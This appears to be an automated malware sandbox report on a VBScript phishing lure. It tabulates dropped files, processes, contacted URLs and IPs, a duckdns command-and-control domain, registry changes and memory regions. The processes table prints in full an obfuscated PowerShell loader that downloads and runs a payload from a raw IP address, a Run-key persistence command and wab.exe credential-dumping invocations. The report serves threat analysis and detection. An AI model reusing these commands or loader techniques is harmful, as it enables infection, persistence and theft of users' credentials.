Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
BRUFEN ORDER VAC442_7467247728478134247.vbs
|
ASCII text, with very long lines (338), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mvourhjs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2qb3ozf.sqi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqyal4ir.ldu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syyrbntd.tkc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0jujrnj.qzt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv4356.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x2ee53106, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Guanamine9.jud
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BRUFEN ORDER VAC442_7467247728478134247.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function
Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes,
$Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo
huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld.
.eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge
AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2
.it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber
' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey
PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee
Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta
As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber
'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc
Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber
'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki
kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp
Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers
(Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt
Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber
'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP
StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo
tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe
akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSki.nSmkkepurgrCardnFacoeBe.s)Euro
';$Brudekjolernes=$Disintegreret[1]+$Brudekjolernes;$Fletoperationerne=$Disintegreret[0];Landlers (Forkber 'Test$UnmogStnkl
UnboPolibUncaaLatrlxylo:,ccuWBloch.ilbeS larUn,aeFleroFa,ln Tre=Glob(semiTdekaeGy esC nttAuko-T.knPD ciaKo,ttU,woh Bet Clam$CretFBevglSinaeOmhatanveo
Amap GaseDisrrScapaProdt NoniR gooHiden TileTe,krBorgn EnseVisc),odd ');while (!$Whereon) {Landlers (Forkber 'Olig$ Flbg Dill
.oloSvrtbSe.baBefalUnco:Ho sSSpl,kForuu Pe nRi akRusseSeler EronMeche ,nc= Ble$HjtitTinkrVaskuFrigeEdel ') ;Landlers $Brudekjolernes;Landlers
(Forkber 'AzotS GyntQuo.aBullrIriatRave-SkibSLilll.apieOp.re frupSkol Di.p4 Svu ');Landlers (Forkber 'Olon$PolygligelB.ndo
BaibSplaaQi,alInfo:TibeWNae.h EpieSe,irVulge RepoKonon For=.ipf(GeruT Dise v,tsSpartP.lt- T lP N iaOatetN nchEssa Del,$BaadFVa
ulkor,eDometSuqro nopAdvoe CharBrndaRandtExtii He o.nkanSmaaeSymprCaminTilbe Alm) Ham ') ;Landlers (Forkber '.elt$ForkgFutilSto
oR.chbGrafaSelvlCert:.idfGnotapForeaPurpk,lekkFyldeToplrKondi Her=Ove,$d sog Nonl FreoAnhnbPseua.yknlAn,i:MagiTZippiSvejlSchism
craJelltGenss PukegarargulpsThru9Son +Pr d+.all%Tra.$UnprP HjelSygeaantesCivitCeriiUnsacRekvkAriloGanor llut .tje ScatEtte7Meas.UdpacTiltoMikku
hvdnIonitMusi ') ;$Beskftigelsesterapiers=$Plastickortet7[$Gpakkeri];}Landlers (Forkber 'Brtt$Trisg kralpreco Em bH nda .anlSmed:St
rShverpcockaUsikr Affk Un e ,nad Im r CemaMaalgAequtUsmaeLandr Ops Glgg=Tril .dpeGLethe ,aptSoci-GrdeCD,kuoRip n .pet Ep.eCathnDysft
Hav nos$BlanFLetll .iae Po tPublo S.ipFl.le .anr GehaDolptAnsti timo PytnCarle MarrAfron.vane.esp ');Landlers (Forkber '
Ink$Strkg eallIncroEssabGramastadlElae:SpatLdictiTrirzRetiaDemorS,etd BagfGoodif,nksUnhohA ti Gge =Rece La.t[E keS atayPrersCreptWosieInd
mTouc. elsCForuo .honLandvin,eeSkrmrByertLose] E,h:bedu:Ove FI.nerFra,oKendm,orsBRaadaUns.sBreae am6Fle.4BuhrSMurktRecorOptniOp,an
Idyg Hir(Adju$ UnfSFau.p ,psaNoner.riskvau,eItemdMaterSa.kaNonhgAbcet U.deSo erD,da) Enk ');Landlers (Forkber 'K.ip$,ifagFililMezqoP.eub
ForaInsol Mis:cou.UUpfln lasd ForePro.rUnl.kImaguBl.ceMaskd W iePerisV rd Pyos=Olie Rh,n[Bol.SWinrymucis.ucctLedeeHonomFene.ErhvTF,rdeU
tuxZ omtAur .BeseEquadnVergcLittoLabydBr.ii Ha.nDextgChim]P ci:R.nd:RentA Hv.S BorC RenI Kn.Isy.v. ascGTeraeUdpltHercSAme
tKortrAvisi ebinDis.g,lai(Ma a$enetLByrdi FilzLiljaNaborF.ordMedifOutciUns,sSkaahStv,)Pros ');Landlers (Forkber 'Unco$me.ig
metl,lloocas bEkstatankl App:SvejTAbetzsmrru Sitt S.ruTrilh EsciFiskl,omp=Slid$FortUopdknDyspdNonre N.drNoc.k Ly uNon,eLibed
aeneFrkksHomo.ImposRemouSu.nbShirsMacrtSeamrBrugiCobanKonsgLill(Flen2S rk9Sels2Soci4,eso6Bask1 Fo ,Semi2Subr8Pant0Over6Spi.2trag)
Ph, ');Landlers $Tzutuhil;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function
Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes,
$Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo
huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld.
.eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge
AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2
.it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber
' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey
PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee
Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta
As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber
'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc
Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber
'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki
kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp
Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers
(Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt
Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber
'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP
StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo
tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe
akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSki.nSmkkepurgrCardnFacoeBe.s)Euro
';$Brudekjolernes=$Disintegreret[1]+$Brudekjolernes;$Fletoperationerne=$Disintegreret[0];Landlers (Forkber 'Test$UnmogStnkl
UnboPolibUncaaLatrlxylo:,ccuWBloch.ilbeS larUn,aeFleroFa,ln Tre=Glob(semiTdekaeGy esC nttAuko-T.knPD ciaKo,ttU,woh Bet Clam$CretFBevglSinaeOmhatanveo
Amap GaseDisrrScapaProdt NoniR gooHiden TileTe,krBorgn EnseVisc),odd ');while (!$Whereon) {Landlers (Forkber 'Olig$ Flbg Dill
.oloSvrtbSe.baBefalUnco:Ho sSSpl,kForuu Pe nRi akRusseSeler EronMeche ,nc= Ble$HjtitTinkrVaskuFrigeEdel ') ;Landlers $Brudekjolernes;Landlers
(Forkber 'AzotS GyntQuo.aBullrIriatRave-SkibSLilll.apieOp.re frupSkol Di.p4 Svu ');Landlers (Forkber 'Olon$PolygligelB.ndo
BaibSplaaQi,alInfo:TibeWNae.h EpieSe,irVulge RepoKonon For=.ipf(GeruT Dise v,tsSpartP.lt- T lP N iaOatetN nchEssa Del,$BaadFVa
ulkor,eDometSuqro nopAdvoe CharBrndaRandtExtii He o.nkanSmaaeSymprCaminTilbe Alm) Ham ') ;Landlers (Forkber '.elt$ForkgFutilSto
oR.chbGrafaSelvlCert:.idfGnotapForeaPurpk,lekkFyldeToplrKondi Her=Ove,$d sog Nonl FreoAnhnbPseua.yknlAn,i:MagiTZippiSvejlSchism
craJelltGenss PukegarargulpsThru9Son +Pr d+.all%Tra.$UnprP HjelSygeaantesCivitCeriiUnsacRekvkAriloGanor llut .tje ScatEtte7Meas.UdpacTiltoMikku
hvdnIonitMusi ') ;$Beskftigelsesterapiers=$Plastickortet7[$Gpakkeri];}Landlers (Forkber 'Brtt$Trisg kralpreco Em bH nda .anlSmed:St
rShverpcockaUsikr Affk Un e ,nad Im r CemaMaalgAequtUsmaeLandr Ops Glgg=Tril .dpeGLethe ,aptSoci-GrdeCD,kuoRip n .pet Ep.eCathnDysft
Hav nos$BlanFLetll .iae Po tPublo S.ipFl.le .anr GehaDolptAnsti timo PytnCarle MarrAfron.vane.esp ');Landlers (Forkber '
Ink$Strkg eallIncroEssabGramastadlElae:SpatLdictiTrirzRetiaDemorS,etd BagfGoodif,nksUnhohA ti Gge =Rece La.t[E keS atayPrersCreptWosieInd
mTouc. elsCForuo .honLandvin,eeSkrmrByertLose] E,h:bedu:Ove FI.nerFra,oKendm,orsBRaadaUns.sBreae am6Fle.4BuhrSMurktRecorOptniOp,an
Idyg Hir(Adju$ UnfSFau.p ,psaNoner.riskvau,eItemdMaterSa.kaNonhgAbcet U.deSo erD,da) Enk ');Landlers (Forkber 'K.ip$,ifagFililMezqoP.eub
ForaInsol Mis:cou.UUpfln lasd ForePro.rUnl.kImaguBl.ceMaskd W iePerisV rd Pyos=Olie Rh,n[Bol.SWinrymucis.ucctLedeeHonomFene.ErhvTF,rdeU
tuxZ omtAur .BeseEquadnVergcLittoLabydBr.ii Ha.nDextgChim]P ci:R.nd:RentA Hv.S BorC RenI Kn.Isy.v. ascGTeraeUdpltHercSAme
tKortrAvisi ebinDis.g,lai(Ma a$enetLByrdi FilzLiljaNaborF.ordMedifOutciUns,sSkaahStv,)Pros ');Landlers (Forkber 'Unco$me.ig
metl,lloocas bEkstatankl App:SvejTAbetzsmrru Sitt S.ruTrilh EsciFiskl,omp=Slid$FortUopdknDyspdNonre N.drNoc.k Ly uNon,eLibed
aeneFrkksHomo.ImposRemouSu.nbShirsMacrtSeamrBrugiCobanKonsgLill(Flen2S rk9Sels2Soci4,eso6Bask1 Fo ,Semi2Subr8Pant0Over6Spi.2trag)
Ph, ');Landlers $Tzutuhil;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ
/d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\otdfknajrvlikyvb"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\znrylxtlfddvmfrffvw"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty
-Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
|
||
|
C:\Windows\System32\wbem\WMIADAP.exe
|
wmiadap.exe /F /T /R
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://geoplugin.net/json.gpc
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://geoplugin.net/json.gpFa)D
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.163/Hylasmus.ocx
|
87.121.105.163
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPermsEviduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://geoplugin.net/json.gp3a
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin8
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpg:3
|
unknown
|
||
|
http://87.121.105.163/Hylasmus.ocxXRxlD
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binU
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
|
87.121.105.163
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
45.88.90.110
|
|
|
|
jgbours284hawara02.duckdns.org
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.88.90.110
|
jgbours284hawara01.duckdns.org
|
Bulgaria
|
|
|
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Martyrmines
|
Pamphletical
|
||
|
HKEY_CURRENT_USER\Environment
|
Balancegang
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Subtruncated
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7072000
|
heap
|
page read and write
|
|
|
|
B076000
|
direct allocation
|
page execute and read and write
|
|
|
|
5B05000
|
trusted library allocation
|
page read and write
|
|
|
|
8830000
|
direct allocation
|
page execute and read and write
|
|
|
|
1FD54C70000
|
trusted library allocation
|
page read and write
|
|
|
|
2F45000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD5CFFD000
|
heap
|
page read and write
|
||
|
97CF5FF000
|
stack
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
5A40A3E000
|
stack
|
page read and write
|
||
|
231C0000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
70AE000
|
heap
|
page read and write
|
||
|
1F642CF2000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
1FD5CF51000
|
heap
|
page read and write
|
||
|
347E000
|
stack
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
8290000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD45F1C000
|
trusted library allocation
|
page read and write
|
||
|
8515000
|
trusted library allocation
|
page read and write
|
||
|
CF1000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
4AB6000
|
trusted library allocation
|
page read and write
|
||
|
303B000
|
trusted library allocation
|
page read and write
|
||
|
6EB0000
|
heap
|
page read and write
|
||
|
73A8000
|
heap
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
229F0000
|
direct allocation
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page read and write
|
||
|
233C1000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
500C000
|
heap
|
page read and write
|
||
|
1F640DBD000
|
heap
|
page read and write
|
||
|
1FD5D27F000
|
heap
|
page read and write
|
||
|
23499000
|
heap
|
page read and write
|
||
|
1F6429E7000
|
heap
|
page read and write
|
||
|
27CD000
|
stack
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
33B0000
|
heap
|
page readonly
|
||
|
C90000
|
heap
|
page read and write
|
||
|
23129000
|
heap
|
page read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
1FD42FDF000
|
heap
|
page read and write
|
||
|
2AEC000
|
stack
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
2AE7000
|
stack
|
page read and write
|
||
|
6E2D000
|
stack
|
page read and write
|
||
|
1FD44940000
|
heap
|
page read and write
|
||
|
1F640DA6000
|
heap
|
page read and write
|
||
|
2670000
|
heap
|
page read and write
|
||
|
1FD5D28A000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
heap
|
page read and write
|
||
|
1F642D1C000
|
heap
|
page read and write
|
||
|
1F640D19000
|
heap
|
page read and write
|
||
|
1F642CD2000
|
heap
|
page read and write
|
||
|
1FD43130000
|
heap
|
page read and write
|
||
|
316F000
|
stack
|
page read and write
|
||
|
1F640C4B000
|
heap
|
page read and write
|
||
|
7310000
|
heap
|
page read and write
|
||
|
1FD449C0000
|
trusted library allocation
|
page read and write
|
||
|
2312A000
|
heap
|
page read and write
|
||
|
DD0000
|
trusted library allocation
|
page read and write
|
||
|
1F640D1E000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
1FD44AB0000
|
heap
|
page execute and read and write
|
||
|
1F6429BE000
|
heap
|
page read and write
|
||
|
1F640C40000
|
heap
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
3137000
|
heap
|
page read and write
|
||
|
23439000
|
heap
|
page read and write
|
||
|
87FC000
|
stack
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
